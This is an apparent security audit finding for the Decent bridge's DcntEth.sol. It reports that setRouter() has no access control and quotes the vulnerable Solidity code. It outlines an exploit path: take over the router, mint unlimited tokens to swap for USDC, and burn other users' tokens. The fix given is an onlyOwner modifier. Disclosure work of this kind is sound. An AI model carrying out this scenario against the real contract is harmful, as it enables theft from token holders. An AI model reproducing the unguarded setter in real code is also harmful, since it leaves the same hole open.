Decent - adeolu's results

Lines of code

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L20

Vulnerability details

Impact

the function setRouter has no access control allowing anyone to call it and set the router address to whatever address the caller likes. Unrestricted access to this function will by extension cause unrestricted access to the functions that implement the onlyRouter() modifier because an attacker can simply change the router address to its address and call the mint() and burn() functions to mint unlimited amount of tokens or burn tokens from a legitimate holder/user address.

exploit scenario

• attacker call setRouter() to change router address to it's address
• calls mint() to mint unlimited amount of tokens and swap to usdc in a uniswap pool
• calls burn() to burn tokens from another address, can be a legitimate user or even the pool address.

Proof of Concept

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L20C2-L22C6

    function setRouter(address _router) public {
        router = _router;
    }

as we can see in the setRouter() code there is unrestricted access to the setRouter() function. The mint and burn functions below use the onlyRouter modifier and are to be called by only the router address. unrestricted access to the setRouter() will cause an attacker to change the address to its address and call the mint and burn functions sucesfully.

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L24C1-L30C6

    function mint(address _to, uint256 _amount) public onlyRouter {
        _mint(_to, _amount);
    }

    function burn(address _from, uint256 _amount) public onlyRouter {
        _burn(_from, _amount);
    }

Tools Used

manual review

Recommended Mitigation Steps

add onlyOwner() modifier to the setRouter() function.

Assessed type

Access Control